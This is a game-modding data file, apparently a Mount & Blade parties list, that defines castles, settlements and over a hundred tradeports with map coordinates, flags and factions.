("reykjabik", "Reykjabik", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (469.14, -574.7), [], 255.0),
("la_romana", "La romana", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (982.64, 59.92), [], 315.0),
("karratha", "Karratha", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1020.36, 467.16), [], 255.0),
("kakadu", "Kakadu", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1217.72, 367.08), [], 175.0),
("huntsville", "Huntsville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1175.12, -117.76), [], 115.0),
("fayetteville", "Fayetteville", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1091.0, -121.56), [], 35.0),
("lakeland", "Lakeland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1124.64, -41.88), [], 65.0),
("tulsa", "Tulsa", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.6, -134.64), [], 235.0),
("omaha", "Omaha", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1277.68, -197.64), [], 255.0),
("san_antonio", "San antonio", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1305.4, -56.68), [], 225.0),
("bayamo", "Bayamo", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1066.28, 40.16), [], 185.0),
("mobile", "Mobile", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1191.2, -71.72), [], 75.0),
("santos", "Santos", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (736.0, 481.08), [], 65.0),
("porto_seguro", "Porto seguro", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (656.4, 403.76), [], 45.0),
("arborg", "Arborg", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (458.64, -571.36), [], 90.0),
("vinland", "Vinland", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (852.12, -326.56), [], 125.0),
("brattalid", "Brattalid", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (720.12, -493.96), [], 145.0),
("vinland_village", "Vinland Settlements", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (858.6, -317.2), [], 25.0),
("brattalid_village", "Brattalid Settlements", icon_point_mark|pf_disabled|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (726.08, -500.68), [], 115.0),
("mombasa", "Mombasa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-200.88, 280.4), [], 40.0),
("mozambique", "Mozambique", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-213.48, 389.36), [], 35.0),
("luanda", "Luanda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.32, 329.72), [], 125.0),
("yaounde", "Yaounde", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (103.64, 205.0), [], 280.0),
("gunue", "Gunue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-174.24, 394.48), [], 65.0),
("malabo", "Malabo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.68, 207.86), [], 265.0),
("nairobi", "Nairobi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-173.2, 255.08), [], 45.0),
("kimayo", "Kimayo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-233.56, 242.4), [], 85.0),
("boma", "Boma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (86.24, 309.72), [], 85.0),
("karagandy", "Karagandy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-568.52, -312.12), [], 145.0),
("samara", "Samara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-316.56, -371.94), [], 55.0),
("naiman", "Naiman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-733.2, -275.2), [], 165.0),
("oskemen", "Oskemen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-671.0, -318.0), [], 25.0),
("saransk", "Saransk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-263.92, -385.72), []),
("karazhal", "Karazhal", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-547.8, -289.2), [], 45.0),
("ridder", "Ridder", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-682.72, -325.08), [], 55.0),
("yalta", "Yalta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-143.16, -241.52), [], 90.0),
("naiman_ger", "Naiman ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-760.0, -269.76), [], 170.0),
("nomad_yurt_1", "Nomad yurt 1", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-181.16, -300.8), [], 70.0),
("nomad_yurt_2", "Nomad yurt 2", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-331.52, -338.52), [], 15.0),
("nomad_yurt_3", "Nomad yurt 3", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-473.8, -317.88), [], 275.0),
("nomad_yurt_4", "Nomad yurt 4", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-617.28, -321.96), [], 315.0),
("xiongnu", "Xiongnu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.96, -154.6), [], 15.0),
("wuhuan", "Wuhuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1047.2, -208.0), [], 325.0),
("goa", "Goa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-580.0, 92.0), [], 135.0),
("calcutta", "Calcutta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-735.6, 17.6), [], 260.0),
("vijayanagara", "Vijayanagara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-681.8, 64.0), [], 260.0),
("mumbai", "Mumbai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-567.2, 54.24), []),
("columbo", "Columbo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-644.64, 175.48), []),
("mysore", "Mysore", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-608.0, 121.92), [], 180.0),
("cochi", "Cochi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-605.3, 147.06), [], 75.0),
("chennai", "Chennai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-646.56, 114.76), [], 45.0),
("aurangabad", "Aurangabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-593.48, 45.48), [], 145.0),
("ranchi", "Ranchi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-702.4, 8.96), [], 275.0),
("vijayawada", "Vijayawada", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-650.52, 81.2), [], 260.0),
("pune", "Pune", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-577.2, 60.0), [], 90.0),
("kandy", "Kandy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-651.24, 170.0), [], 180.0),
("rajkot", "Rajkot", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-544.0, 20.28), [], 45.0),
("place_end", "place end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.0, 52.0), []),
("tradeport1", "St Helena", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (291.16, 398.48), [], 340.0),
("tradeport2", "Toliara", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-247.8, 477.1), [], 90.0),
("tradeport3", "Socotra", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-359.54, 121.58), [], 180.0),
("tradeport4", "Batavia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-943.8, 300.88), [], 330.0),
("tradeport5", "Santa Cruz", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (406.86, -45.64), [], 225.0),
("tradeport6", "Sierra Leone", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (395.38, 135.4), [], 135.0),
("tradeport7", "Nicobar", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-781.8, 123.6), [], 90.0),
("tradeport8", "Aceh", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-811.6, 188.48), [], 45.0),
("tradeport9", "Luanda", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (85.78, 329.1), [], 45.0),
("tradeport10", "Bermuda", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (935.68, -87.88), [], 225.0),
("tradeport11", "Chaleston", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1100.48, -95.32), [], 215.0),
("tradeport12", "San Juan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (950.72, 59.48), [], 340.0),
("tradeport13", "Barbados", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (880.32, 111.98), [], 40.0),
("tradeport14", "Havana", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1127.8, 10.88), []),
("tradeport15", "Santo Domingo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (997.88, 62.24), [], 180.0),
("tradeport16", "Santo Maria", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1040.02, 132.42), [], 15.0),
("tradeport17", "New Heaven", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1025.34, -197.46), [], 200.0),
("tradeport18", "San Miguel", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1178.56, 39.34), []),
("tradeport19", "Aden", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-262.7, 116.36), [], 195.0),
("tradeport20", "Mogadishu", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-267.94, 221.96), [], 225.0),
("tradeport21", "Cape Verde", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (486.38, 93.22), []),
("tradeport22", "Port Hedland", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1069.08, 442.64), [], 20.0),
("tradeport23", "Merauke", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1305.82, 327.38), [], 135.0),
("tradeport24", "Nagasaki", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1188.14, -93.18), [], 135.0),
("tradeport25", "Busan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1181.26, -122.0), [], 225.0),
("tradeport26", "Shanghai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1101.94, -75.68), [], 265.0),
("tradeport27", "Weihai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1105.26, -150.98), [], 315.0),
("tradeport28", "Manila", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1091.96, 99.3), [], 90.0),
("tradeport29", "Nanzi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1084.34, 16.9), [], 135.0),
("tradeport30", "Haiphong", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-936.62, 37.92), [], 225.0),
("tradeport31", "Bangkok", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-869.76, 110.7), [], 180.0),
("tradeport32", "Calcutta", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-735.8, 26.8), [], 165.0),
("tradeport33", "Goa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-575.82, 90.2), [], 105.0),
("tradeport34", "Lisbon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (328.62, -162.24), [], 180.0),
("tradeport35", "Cadiz", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (298.24, -140.0), [], 120.0),
("tradeport36", "Bristol", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (259.52, -342.56), [], 80.0),
("tradeport37", "Nante", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (249.9, -279.66), [], 135.0),
("tradeport38", "Amsterdam", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (173.64, -358.62), [], 330.0),
("tradeport39", "Copenhagen", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (94.34, -407.86), [], 270.0),
("tradeport40", "Stockholm", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (23.52, -472.22), [], 225.0),
("tradeport41", "Ceuta", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (288.74, -130.76), []),
("tradeport42", "Valencia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (231.8, -177.28), [], 270.0),
("tradeport43", "Marseille", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (170.56, -224.36), [], 100.0),
("tradeport44", "Syracuse", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (62.26, -146.62), [], 270.0),
("tradeport45", "Roma", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (96.08, -206.28), [], 135.0),
("tradeport46", "Tunis", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (117.12, -144.96), [], 300.0),
("tradeport47", "Athens", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-33.04, -152.98), [], 210.0),
("tradeport48", "Alexandria", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-97.82, -77.6), [], 25.0),
("tradeport49", "Constantinople", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-84.18, -194.84), [], 160.0),
("tradeport50", "Tripoli", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-163.08, -115.28), [], 60.0),
("tradeport51", "Muscat", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-410.0, 5.92), []),
("tradeport52", "Cape town", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (28.34, 592.82), [], 45.0),
("tradeport53", "Mozambique", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-215.28, 384.76), [], 270.0),
("tradeport54", "Calabar", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (138.34, 198.74), [], 180.0),
("tradeport55", "Ponta Delgada", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (509.42, -152.42), [], 135.0),
("tradeport56", "Funchal", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (414.36, -93.14), [], 175.0),
("tradeport57", "San Andres", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1119.84, 121.94), [], 115.0),
("tradeport58", "London", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (225.0, -342.52), [], 240.0),
("tradeport59", "Incheon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1153.04, -148.46), [], 90.0),
("tradeport60", "Lome", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (217.46, 184.68), [], 225.0),
("tradeport61", "Gdynia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (25.94, -391.94), [], 295.0),
("tradeport62", "Oslo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (113.6, -487.32), [], 180.0),
("tradeport63", "Carballo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (324.58, -225.52), []),
("tradeport64", "Hongkong", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1014.72, 21.88), [], 180.0),
("tradeport65", "Le havre", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (228.04, -312.32), [], 90.0),
("tradeport66", "Rio de janeiro", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (697.74, 471.84), [], 180.0),
("tradeport67", "Sakai", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1249.52, -115.96), [], 90.0),
("tradeport68", "Mombasa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-203.56, 283.12), [], 260.0),
("tradeport69", "Venezia", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (92.61, -254.04), [], 225.0),
("tradeport70", "Sham el sheikh", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-145.0, -39.42), [], 225.0),
("tradeport71", "Abadan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-300.42, -60.64), [], 225.0),
("tradeport72", "Tianjin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1057.0, -168.2), [], 225.0),
("tradeport73", "Karachi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-504.06, -4.82), [], 125.0),
("tradeport74", "Trabzon", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-206.4, -195.26), []),
("tradeport75", "Riga", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-33.66, -436.26), [], 35.0),
("tradeport76", "Edo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1297.84, -126.76), [], 235.0),
("tradeport77", "Izumo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1220.72, -124.96), [], 90.0),
("tradeport78", "Lianyungang", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1075.2, -117.66), [], 315.0),
("tradeport79", "Yingkou", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1103.68, -189.48), [], 135.0),
("tradeport80", "Haesamwi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1209.86, -219.32), [], 225.0),
("tradeport81", "Sapporo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1313.76, -223.98), [], 35.0),
("tradeport82", "Caliari", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (131.48, -169.62), [], 245.0),
("tradeport83", "Rhodes", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-77.66, -134.42), [], 225.0),
("tradeport84", "Mokpo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1148.2, -116.14), [], 115.0),
("tradeport85", "Wenzhou", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1089.58, -39.26), [], 225.0),
("tradeport86", "Bordeaux", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (237.82, -251.74), [], 5.0),
("tradeport87", "Dublin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (295.7, -372.86), [], 270.0),
("tradeport88", "Bremerhavan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (136.5, -376.6), [], 40.0),
("tradeport89", "Odesa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-106.22, -266.62), [], 225.0),
("tradeport90", "Benghazi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (9.08, -88.36), [], 55.0),
("tradeport91", "Jeddah", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-197.64, 28.44), [], 100.0),
("tradeport92", "Gaza", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-146.48, -80.9), [], 45.0),
("tradeport93", "Columbo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-642.28, 173.3), [], 100.0),
("tradeport94", "Bintulu", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1006.6, 209.14), [], 45.0),
("tradeport95", "Darwin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1199.3, 363.54), [], 45.0),
("tradeport96", "Sipontum", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (54.8, -202.74), [], 235.0),
("tradeport97", "Massawa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-203.64, 90.0), [], 20.0),
("tradeport98", "Tortuga", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1022.12, 43.54), [], 170.0),
("tradeport99", "Alger", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (195.08, -142.5), []),
("tradeport100", "Port Royal", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1077.12, 65.84), [], 200.0),
("tradeport101", "Tsushima", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1183.9, -112.0), [], 225.0),
("tradeport102", "Shilin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1097.08, -11.02), [], 25.0),
("tradeport103", "Jaffna", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-643.94, 149.14), [], 155.0),
("tradeport104", "Mayotte", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-262.54, 368.54), [], 135.0),
("tradeport105", "Mindelo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (502.22, 73.54), [], 315.0),
("tradeport106", "San fernaldo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (900.62, 141.98), [], 90.0),
